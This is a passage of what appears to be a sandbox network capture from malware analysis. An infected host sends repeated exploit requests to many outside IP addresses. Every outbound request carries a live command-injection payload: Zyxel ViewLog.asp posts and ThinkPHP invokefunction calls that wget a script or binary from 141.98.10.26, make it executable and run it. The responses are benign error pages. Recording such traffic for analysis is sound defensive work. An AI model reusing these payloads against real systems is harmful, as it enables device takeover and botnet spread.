Nov 22, 2023 08:39:56.674304008 CET	15328	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.23	51282	62.197.233.121	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.842145920 CET	6520	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.23	51070	62.248.233.169	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.851174116 CET	6520	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.23	45214	31.13.238.215	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.858455896 CET	6521	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:44.077162981 CET	6553	IN	HTTP/1.1 404 Not Found Server: nginx/1.13.12 Date: Wed, 22 Nov 2023 07:38:43 GMT Content-Type: text/html Content-Length: 170 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 33 2e 31 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.13.12</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.23	52942	94.187.115.186	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.863190889 CET	6522	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.23	33484	94.120.62.231	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.866153955 CET	6522	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.23	35422	94.122.73.235	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.869749069 CET	6523	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.23	51558	95.86.86.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.878906965 CET	6524	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.23	43288	95.179.134.30	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.346628904 CET	6712	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:45.919487000 CET	6738	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:46.098242044 CET	6739	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:46 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.23	60068	95.181.216.80	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.358062029 CET	6713	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:45.551237106 CET	6720	IN	HTTP/1.0 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="login" Connection: close Content-type: text/html; charset=utf-8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.23	60534	95.213.252.227	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.358567953 CET	6714	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:45.552814960 CET	6721	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:45 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.23	53504	95.216.33.132	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.359839916 CET	6714	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:45.554826021 CET	6721	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:45 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.23	39530	95.0.177.102	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.389534950 CET	6715	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:45.614559889 CET	6732	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:45 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.23	49892	95.181.228.150	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:45.911211967 CET	6737	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:46.272293091 CET	6805	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Wed, 22 Nov 2023 07:38:46 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.23	55754	112.176.165.16	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.205745935 CET	6800	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:46.500627995 CET	6902	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 22 Nov 2023 07:38:46 GMT Server: httpd Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.23	58304	112.125.254.62	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.219569921 CET	6801	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:46.528141022 CET	6904	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:40 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.23	43298	112.135.209.173	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.231038094 CET	6802	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.23	54714	112.126.151.133	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.231447935 CET	6803	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:46.551769972 CET	6906	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:44 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.23	46894	31.136.122.113	8080

Timestamp	kBytes transferred	Direction	Data
